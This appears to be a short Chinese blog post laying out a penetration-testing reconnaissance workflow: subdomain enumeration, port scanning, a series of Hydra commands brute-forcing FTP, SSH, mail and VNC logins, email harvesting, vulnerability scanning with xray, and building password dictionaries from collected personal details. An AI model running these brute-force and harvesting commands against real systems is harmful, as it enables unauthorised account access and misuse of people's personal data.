0x01域名收集

获得域名后,首先检查有没有域传送,接着用搜索引擎或oneforall,JSFinder等工具获得二级域名,子域名,ip等信息

oneforall python3 oneforall.py --target 192.168.1.1 --port=large --format=xls --path="C:\Users\DRY\Desktop\excelsior.xls" run 

oneforall更新 git fetch --all git reset --hard origin/master git pull 

JSFinder python3 JSFinder.py -u 192.168.1.1 -ou C:\Users\DRY\Desktop\url.xls -os C:\Users\DRY\Desktop\subdomain.xls 扫描文件可-f

0x02端口扫描

使用goby等端口扫描工具扫描ip开放的端口服务,查看是否开放例如21(ftp)等危险端口,接着用相应工具进行爆破,例如

用hydra爆破ftp(21) hydra 192.168.1.1 ftp -L ftp-user.txt -P ftp-pass.txt -e ns -o ftp.txt -vV 

用hydra爆破ssh(22) hydra 192.168.1.1 ssh -L ssh-user.txt -P ssh-pass.txt -e ns -o ssh.txt -vV 

用hydra爆破pop3(110) hydra 192.168.1.1 pop3 -L ssh-user.txt -P ssh-pass.txt -e ns -o pop3.txt -vV 

用hydra爆破imap(143) hydra 192.168.1.1 imap -L ftp-user.txt -P ftp-pass.txt -e ns -o imap.txt -vV 

用hydra爆破smtps(465) hydra 192.168.1.1 smtps -L ftp-user.txt -P ftp-pass.txt -e ns -o smtps.txt -vV 

用hydra爆破smtp(587) hydra 192.168.1.1 smtp -L ftp-user.txt -P ftp-pass.txt -e ns -o smtp.txt -vV 

用hydra爆破imaps(993) hydra 192.168.1.1 imaps -L ftp-user.txt -P ftp-pass.txt -e ns -o imaps.txt -vV 

用hydra爆破pop3s(995) hydra 192.168.1.1 pop3s -L ftp-user.txt -P ftp-pass.txt -e ns -o pop3s.txt -vV 

用hydra爆破vnc(5901) hydra 192.168.1.1 vnc -L ftp-user.txt -P ftp-pass.txt -e ns -o vnc.txt -vV 

0x03有效资产

使用webscan对获取到的ip,域名进行识别筛选出可访问域名,python webscan.py --target target.txt --port large

0x04邮箱收集

使用theHarvester进行邮箱收集,使用收集到的邮箱对之前收集到的有登陆入口的网站进行爆破

0x05漏洞扫描

使用BBScan,x-ray等工具扫描敏感文件,使用wvs扫描web漏洞,使用nessus扫描主机漏洞

 .\xray_windows_amd64.exe webscan --url-file tw.txt --html-output tw.html 

 .\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xray-testphp.html xray监听端口

0x06信息整合

将当前收集的所有信息进行整合,用白鹿社工字典生成器将用户信息(邮箱,用户名,手机号等)生成一个字典,对所有登录入口进行二次爆破

posted on 2020-04-13 22:10  邓阮叶  阅读(438)  评论(0)    收藏  举报